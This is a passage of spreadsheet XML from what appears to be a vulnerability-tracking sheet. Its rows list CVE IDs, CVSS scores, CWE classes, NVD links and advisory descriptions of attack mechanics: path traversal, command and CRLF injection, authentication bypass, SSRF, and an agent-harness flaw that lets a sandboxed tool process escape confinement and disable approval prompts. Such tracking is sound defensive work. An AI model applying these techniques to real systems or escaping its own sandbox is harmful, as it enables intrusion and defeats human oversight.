          <t>luci-app-openvpn fails to properly validate the instance_name2 parameter during file upload, allowing authenticated users to perform path traversal and write arbitrary files outside the intended directory. Attackers can upload malicious payloads to gain persistent root code execution by placing SSH keys in system directories accessible on reboot.</t>
        </is>
      </c>
      <c r="M388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72841</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72842</t>
        </is>
      </c>
      <c r="C389" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D389" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E389" s="5" t="inlineStr"/>
      <c r="F389" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>luci-app-lxc contains an ACL inconsistency vulnerability that allows low-privileged authenticated LuCI users to access backend container management routes without proper authorization checks. Attackers can exploit path traversal via `/.%2E` in the `lxc_name` parameter to escape container directories and control host-side scripts executed through `lxc.hook.start-host`, achieving root code execution on the OpenWrt host.</t>
        </is>
      </c>
      <c r="M389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72842</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72879</t>
        </is>
      </c>
      <c r="C390" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D390" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E390" s="5" t="inlineStr"/>
      <c r="F390" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G390" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.8, the getRegistryCommands() function in packages/server/src/utils/cluster/upload.ts interpolates registry.password and registry.registryUrl directly into a shell command without escaping. An authenticated user with project access can configure malicious registry credentials and trigger a swarm deployment to execute arbitrary OS commands on the Dokploy server, read or modify host files, and access other containers through Docker. This issue is fixed in version 0.29.8.</t>
        </is>
      </c>
      <c r="M390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72879</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73653</t>
        </is>
      </c>
      <c r="C391" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D391" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E391" s="5" t="inlineStr"/>
      <c r="F391" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-552, CWE-862</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr">
        <is>
          <t>Vitest is a testing framework powered by Vite. Prior to versions 3.2.7, 4.1.10, and 5.0.0-beta.6, Browser Mode provider commands including upload, takeScreenshot, screenshotMatcher, stopChunkTrace, deleteTracing, and annotateTraces accept browser-supplied file paths without enforcing the allowWrite permission gate or confining paths to the project root. A client that can reach the Browser Mode API can read arbitrary local files, create or overwrite image and trace files, or delete files accessible to the Vitest process even when allowWrite is false. This issue is fixed in versions 3.2.7, 4.1.10, and 5.0.0-beta.6.</t>
        </is>
      </c>
      <c r="M391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73653</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75925</t>
        </is>
      </c>
      <c r="C392" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D392" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E392" s="5" t="inlineStr"/>
      <c r="F392" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of CRLF sequences in IXON VPN Client before version 1.4.7 allows an attacker to execute commands as root or SYSTEM. Configuration values accepted by the local service are written to a file later consumed by a privileged subprocess, without line-ending sequences being neutralized, which allows additional directives to be introduced into that file. The configuration interface accepts changes without authenticating or verifying the origin of the requester. The injected configuration persists on disk across restarts of the client and the operating system, and the VPN connection continues to function normally, so there is no behavioral change visible to the user.</t>
        </is>
      </c>
      <c r="M392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75925</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="C393" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D393" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E393" s="5" t="inlineStr"/>
      <c r="F393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G393" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="M393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81046</t>
        </is>
      </c>
      <c r="C394" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D394" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E394" s="5" t="inlineStr"/>
      <c r="F394" s="5" t="inlineStr"/>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Protection Mechanism Failure vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Arbitrary Code Execution within the application context.</t>
        </is>
      </c>
      <c r="M394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81046</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82533</t>
        </is>
      </c>
      <c r="C395" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D395" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E395" s="5" t="inlineStr"/>
      <c r="F395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr">
        <is>
          <t>DeepSeek Harness before 0.1.2-alpha.1 contains an authentication bypass vulnerability that grants unauthenticated access to its local HTTP agent-control API by accepting a client-supplied loopback Host header in place of validating the actual TCP connection origin. On the default configuration, a confined tool-executed process can reach the loopback API without any port exposure and use it to escape its own OS sandbox, escalate to unconfined execution, and disable the approval prompt. When the port is externally reachable via tunnel, SSH forward, or reverse proxy, a remote attacker can exploit the same flaw to create sessions, execute arbitrary commands, and exfiltrate stored conversation transcripts without credentials.</t>
        </is>
      </c>
      <c r="M395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84200</t>
        </is>
      </c>
      <c r="C396" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D396" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E396" s="5" t="inlineStr"/>
      <c r="F396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr">
        <is>
          <t>Kyverno versions v1.9.0 through v1.12.7 contain a policy exception handling flaw. When a policy in enforce mode is combined with two PolicyExceptions, the less restrictive exception takes precedence, allowing an attacker to bypass the policy by crafting a resource name that matches the second exception's name pattern (e.g., '*ingress*'). This can be used to circumvent policies such as one blocking hostPath volumes. Fixed in v1.13.0.</t>
        </is>
      </c>
      <c r="M396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84200</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86123</t>
        </is>
      </c>
      <c r="C397" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D397" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E397" s="5" t="inlineStr"/>
      <c r="F397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr">
        <is>
          <t>SQL Chat contains four unauthenticated API endpoints that accept client-supplied database connection parameters and execute arbitrary SQL queries against attacker-specified hosts. Attackers can connect to internal databases, execute SQL commands, enumerate schemas, and pivot into the server's network without authentication.</t>
        </is>
      </c>
      <c r="M397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86123</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86148</t>
        </is>
      </c>
      <c r="C398" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D398" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Tenda CP3 27.5.57.101. This vulnerability affects the function SystemAsh of the file Apis/system.c of the component Kylin. The manipulation of the argument AlarmVoiceURL results in os command injection. It is possible to launch the attack remotely.</t>
        </is>
      </c>
      <c r="M398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86148</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86149</t>
        </is>
      </c>
      <c r="C399" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D399" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Tenda CP3 27.5.57.101. This issue affects some unknown processing of the file Net/NetCheckPing.cpp. This manipulation of the argument interface_name/host causes os command injection. The attack can be initiated remotely.</t>
        </is>
      </c>
      <c r="M399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86149</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86151</t>
        </is>
      </c>
      <c r="C400" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D400" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E400" s="5" t="inlineStr"/>
      <c r="F400" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Tenda CP3 27.5.57.101. The affected element is the function sub_2F77E8 of the file Apis/system.c of the component Network Configuration Management. Performing a manipulation results in os command injection. The attack may be initiated remotely.</t>
        </is>
      </c>
      <c r="M400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86151</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86153</t>
        </is>
      </c>
      <c r="C401" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D401" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Tenda CP3 27.5.57.101. This affects the function CRedirServer::SetRedirectEnable of the file Functions/Redirect.cpp. The manipulation leads to improper privilege management. Remote exploitation of the attack is possible.</t>
        </is>
      </c>
      <c r="M401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86153</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88285</t>
        </is>
      </c>
      <c r="C402" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D402" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 exposes a network-accessible PTZ control service without authentication, allowing remote clients to retrieve PTZ information and issue PTZ or raw serial commands.</t>
        </is>
      </c>
      <c r="M402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88285</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54356</t>
        </is>
      </c>
      <c r="C403" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D403" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr">
        <is>
          <t>Kyverno versions 1.9.4 and earlier support insecure 3DES cipher suites (TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA and TLS_RSA_WITH_3DES_EDE_CBC_SHA) on their TLS endpoints. These 64-bit block ciphers are vulnerable to the Sweet32 attack (CVE-2016-2183), which, over very long-lived TLS connections carrying large volumes of traffic, could allow an attacker to recover small amounts of plaintext. The issue is fixed in Kyverno 1.9.5 and 1.10.0.</t>
        </is>
      </c>
      <c r="M403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54356</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54391</t>
        </is>
      </c>
      <c r="C404" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D404" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="L404" s="5" t="inlineStr">
        <is>
          <t>Proxmox Virtual Environment (VE) 7.0 through 8.0 contains an authentication bypass vulnerability in libpve-access-control before 8.0.4 that allows unauthenticated attackers to authenticate as any existing enabled user without a configured second factor by supplying an arbitrary tfa-challenge value in the API login endpoint. Attackers can send a POST request to the access ticket API endpoint with any value in the tfa-challenge parameter to completely skip password verification, gaining unauthorized access including to the root@pam account. All affected releases are end of life.</t>
        </is>
      </c>
      <c r="M404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54391</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58376</t>
        </is>
      </c>
      <c r="C405" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D405" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr">
        <is>
          <t>Renovate versions 37.158.0 before 37.199.0 contain a command injection vulnerability in the helmv3 manager's registryAliases handling that allows attackers with commit access to execute arbitrary commands. Attackers can manipulate registryAliases keys with unquoted shell metacharacters to inject commands executed during helm repo add operations, gaining full access to Renovate's execution environment.</t>
        </is>
      </c>
      <c r="M405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58376</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14813</t>
        </is>
      </c>
      <c r="C406" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D406" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E406" s="5" t="inlineStr"/>
      <c r="F406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G406" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L406" s="5" t="inlineStr">
        <is>
          <t>: Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (core modules).
 This vulnerability is associated with program files G3413CTRBlockCipher.
This issue affects BC-JAVA: from 1.59 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14813</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-31114</t>
        </is>
      </c>
      <c r="C407" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D407" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L407" s="5" t="inlineStr">
        <is>
          <t>Fooocus is an image generating software. In versions 2.5.5 and prior, the Fooocus web UI is vulnerable to remote code execution due to the unsafe use of eval when processing metadata JSON. An attacker with access to the Fooocus web UI may be able to execute arbitrary code on the instance. As of time of publication, no known patched versions are available, but a suggested fix pull request is available.</t>
        </is>
      </c>
      <c r="M407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-31114</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71401</t>
        </is>
      </c>
      <c r="C408" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D408" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E408" s="5" t="inlineStr"/>
      <c r="F408" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L408" s="5" t="inlineStr">
        <is>
          <t>better-auth (npm) before 1.4.2 allows an external request to configure baseURL when it is not otherwise defined (e.g., BETTER_AUTH_URL is unset). An attacker able to make the very first request to the server after startup can poison the router's base path, causing all routes to return 404 for all users (denial of service). The issue is not reachable when baseURL is explicitly configured or on typical managed hosting platforms.</t>
        </is>
      </c>
      <c r="M408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71401</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15378</t>
        </is>
      </c>
      <c r="C409" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D409" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E409" s="5" t="inlineStr"/>
      <c r="F409" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G409" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr">
        <is>
          <t>2026-07-10</t>
        </is>
      </c>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `guardrails-detectors` component. This vulnerability allows a remote attacker to perform a blind Server-Side Request Forgery (SSRF) by submitting a specially crafted XML Schema Definition (XSD) string. This can lead to unauthorized access to sensitive information, including credentials from cloud metadata services, Kubernetes API, internal MinIO, and other internal network endpoints. Additionally, it enables local file reads of critical data such as service account tokens and pod secrets.</t>
        </is>
      </c>
      <c r="M409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15378</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16876</t>
        </is>
      </c>
      <c r="C410" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D410" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
